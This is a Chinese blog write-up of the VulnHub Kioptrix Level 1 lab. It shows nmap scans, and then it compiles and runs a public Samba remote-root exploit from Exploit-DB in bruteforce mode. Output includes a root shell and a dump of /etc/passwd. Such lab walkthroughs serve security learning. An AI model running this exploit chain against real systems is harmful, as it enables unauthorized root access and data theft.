vulnhub 靶场之Kioptrix 1级VulnHub Boot2Root

2020/08/29 02:52 · Kioptrix ·  原创文章 · 49阅读 · 0评论

Kioptrix 1级VulnHub Boot2Root

 

简介

机器URL:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/描述:Kioptrix VM映像很容易挑战。游戏的目的是通过任何可能的方式获得root用户访问权限(除了实际入侵VM服务器或播放器外)。这些游戏的目的是学习漏洞评估和利用中的基本工具和技术。成功完成挑战的方法不止一种。

环境搭建

访问 https://www.vulnhub.com/entry/kioptrix-level-1-1,22/下载vm镜像

Kali:192.168.2.133

靶机:192.168.2.227

三、实战渗透 

 nmap扫描靶机

nmap 192.168.2.0/24

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-28 22:38 CST
Nmap scan report for RM2100.lan (192.168.2.1)
Host is up (0.0034s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
1080/tcp open  socks

Nmap scan report for chuangmi-plug-v3_miap5EDA.lan (192.168.2.100)
Host is up (0.0047s latency).
All 1000 scanned ports on chuangmi-plug-v3_miap5EDA.lan (192.168.2.100) are closed

Nmap scan report for MiAiSoundbox.lan (192.168.2.117)
Host is up (0.0058s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
53/tcp open  domain
Nmap scan report for zedeMacBook-Pro.lan (192.168.2.120)
Host is up (0.00055s latency).
All 1000 scanned ports on zedeMacBook-Pro.lan (192.168.2.120) are closed (720) or filtered (280)

Nmap scan report for bad.lan (192.168.2.133)

Host is up (0.00068s latency).

All 1000 scanned ports on bad.lan (192.168.2.133) are closed

Nmap scan report for lumi-gateway-v3_miio87687718.lan (192.168.2.153)
Host is up (0.0089s latency).
All 1000 scanned ports on lumi-gateway-v3_miio87687718.lan (192.168.2.153) are closed

Nmap scan report for 192.168.2.227
Host is up (0.0023s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
443/tcp  open  https
1024/tcp open  kdm

确定靶机ip为192.168.2.227 

xiaoze@bad:~/下载$ sudo nmap -sS -sV -O -T4 -p- 192.168.2.227
[sudo] xiaoze 的密码:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-28 23:20 CST
Nmap scan report for 192.168.2.227
Host is up (0.00064s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:50:56:3D:E9:32 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.92 seconds

Nessus扫描结果(谁让我太水了,只能借助Nessus)

确定samba存在漏洞,在https://www.exploit-db.com/网站上搜索了一下  找到了Samba <2.2.8(Linux / BSD)-远程执行代码

下载再来是XX.c文件 gcc编译一下 

xiaoze@bad:~/下载$ gcc samba.c -o exploit
xiaoze@bad:~/下载$ ll
总用量 92
-rwxr-xr-x 1 xiaoze xiaoze 41256 8月  29 00:11 exploit
-rw-r--r-- 1 xiaoze xiaoze 45115 8月  28 22:24 samba.c
xiaoze@bad:~/下载$ ./exploit 
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
Usage: ./exploit [-bBcCdfprsStv] [host]

-b <platform>   bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)
-B <step>       bruteforce steps (default = 300)
-c <ip address> connectback ip address
-C <max childs> max childs for scan/bruteforce mode (default = 40)
-d <delay>      bruteforce/scanmode delay in micro seconds (default = 100000)
-f              force
-p <port>       port to attack (default = 139)
-r <ret>        return address
-s              scan mode (random)
-S <network>    scan mode
-t <type>       presets (0 for a list)
-v              verbose mode

xiaoze@bad:~/下载$ ./exploit -b 0 192.168.2.227
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
whoami
root
pwd
/tmp
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/dev/null
rpm:x:37:37::/var/lib/rpm:/bin/bash
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
rpc:x:32:32:Portmapper RPC user:/:/bin/false
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/bin/false
ident:x:98:98:pident user:/:/sbin/nologin
radvd:x:75:75:radvd user:/:/bin/false
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
apache:x:48:48:Apache:/var/www:/bin/false
squid:x:23:23::/var/spool/squid:/dev/null
pcap:x:77:77::/var/arpwatch:/bin/nologin
john:x:500:500::/home/john:/bin/bash
harold:x:501:501::/home/harold:/bin/bash
cat /ver/mail/root
cat: /ver/mail/root: No such file or directory

您可能感兴趣的文章

本文地址:https://www.ouyangxiaoze.com/2020/08/656.html
版权声明:本文为原创文章,版权归 欧阳小泽 所有,欢迎分享本文,转载请保留出处!

文件下载

boke112导航_独立博客导航平台

下一篇:

 发表评论


表情